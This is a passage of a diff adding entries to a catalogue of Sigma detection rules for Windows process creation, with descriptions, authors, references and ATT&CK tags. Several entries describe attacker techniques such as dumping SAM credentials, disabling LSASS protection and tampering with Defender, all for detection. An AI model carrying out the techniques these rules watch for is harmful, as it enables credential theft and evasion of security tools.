+ "filename": "proc_creation_win_redmimicry_winnti_proc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" + ] + }, + "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "value": "RedMimicry Winnti Playbook Execute" + }, + { + "description": "Detects the export of a crital Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "filename": "proc_creation_win_regedit_export_critical_keys.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", + "value": "Exports Critical Registry Keys To a File" + }, + { + "description": "Detects the export of the target Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate export of keys" + ], + "filename": "proc_creation_win_regedit_export_keys.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "value": "Exports Registry Key To a File" + }, + { + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate import of keys", + "Evernote" + ], + "filename": "proc_creation_win_regedit_import_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "value": "Imports Registry Key From a File" + }, + { + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_regedit_import_keys_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "value": "Imports Registry Key From an ADS" + }, + { + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate modification of keys" + ], + "filename": "proc_creation_win_regini.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", + "value": "Modifies the Registry From a File" + }, + { + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "meta": { + "author": "Eli Salem, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_regini_ads.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "value": "Modifies the Registry From a ADS" + }, + { + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/28", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_reg_add_run_key.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", + "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", + "value": "Reg Add RUN Key" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_add_safeboot.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "value": "Add SafeBoot Keys Via Reg Utility" + }, + { + "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_reg_defender_exclusion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", + "value": "Registry Defender Exclusions" + }, + { + "description": "Detects reg command lines that disable certain important features of Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Rare legitimate use by administrators to test software (should always be investigated)" + ], + "filename": "proc_creation_win_reg_defender_tampering.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", + "value": "Registry Defender Tampering" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_delete_safeboot.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "value": "Delete SafeBoot Keys Via Reg Utility" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_delete_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "value": "Delete Services Via Reg Utility" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_dump_sam.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", + "value": "Registry Dump of SAM Creds and Secrets" + }, + { + "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", + "meta": { + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_enable_rdp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" + ] + }, + "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", + "value": "Enabling RDP Service via Reg.exe" + }, + { + "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate import of keys" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", + "value": "Imports Registry Key From a File Using Reg.exe" + }, + { + "description": "Detects reg command lines that disables PPL on the LSA process", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_lsass_ppl.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.010" + ] + }, + "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "value": "Registry Disabling LSASS PPL" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_service_imagepath_change.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ] + }, + "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "value": "Service ImagePath Change with Reg.exe" + }, + { + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_desktop_tunneling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "value": "Potential Remote Desktop Tunneling" + }, + { + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", + "value": "Remote File Download via Desktopimgdownldr Utility" + }, + { + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + ], + "filename": "proc_creation_win_remote_powershell_session_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" + ] + }, + "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "value": "Remote PowerShell Session Host Process (WinRM)" + }, + { + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the system utilities to discover system time for legitimate reason" + ], + "filename": "proc_creation_win_remote_time_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", + "value": "Discovery of a System Time" + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "meta": { + "author": "frack113", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", + "value": "Remove Windows Defender Definition Files" + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + ], + "filename": "proc_creation_win_renamed_binary.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "value": "Renamed Binary" + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Florian Roth", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + ], + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1036/", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "value": "Highly Relevant Renamed Binary" + }, + { + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_browsercore.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mariuszbit/status/1531631015139102720", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" + ], + "tags": [ + "attack.t1528", + "attack.t1036.003" + ] + }, + "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "value": "Process Creation with Renamed BrowserCore.exe" + }, + { + "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", + "value": "Renamed FTP.EXE Binary Execution" + }, + { + "description": "Detects renamed jusched.exe used by cobalt group", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2019/06/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_jusched.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "value": "Renamed jusched.exe" + }, + { + "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_mavinject.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ] + }, + "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "value": "Rename Mavinject Execution" + }, + { + "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/22", + "falsepositive": [ + "Software that illegaly integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" + ], + "filename": "proc_creation_win_renamed_megasync.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "value": "Renamed MegaSync" + }, + { + "description": "Detects process creation with a renamed Msdt.exe", + "meta": { + "author": "pH-T", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "value": "Renamed Msdt.exe" + }, + { + "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_netsupport_rat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0afbd410-de03-4078-8491-f132303cb67d", + "value": "Execution of Renamed NetSupport RAT" + }, + { + "description": "Detects execution of renamed paexec via imphash and executable product string", + "meta": { + "author": "Jason Lynch", + "creation_date": "2019/04/17", + "falsepositive": [ + "Unknown imphashes" + ], + "filename": "proc_creation_win_renamed_paexec.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003", + "attack.g0046", + "car.2013-05-009", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "value": "Execution of Renamed PaExec" + }, + { + "description": "Execution of a renamed version of the Plink binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_plink.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "value": "Execution Of Renamed Plink Binary" + }, + { + "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/christophetd/status/1164506034720952320", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", + "value": "Renamed PowerShell" + }, + { + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Procdump illegaly bundled with legitimate software", + "Weird admins who renamed binaries (and should be investigated)" + ], + "filename": "proc_creation_win_renamed_procdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "value": "Renamed ProcDump" + }, + { + "description": "Detects the execution of a renamed PsExec often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/05/21", + "falsepositive": [ + "Software that illegaly integrates PsExec in a renamed form", + "Administrators that have renamed PsExec and no one knows why" + ], + "filename": 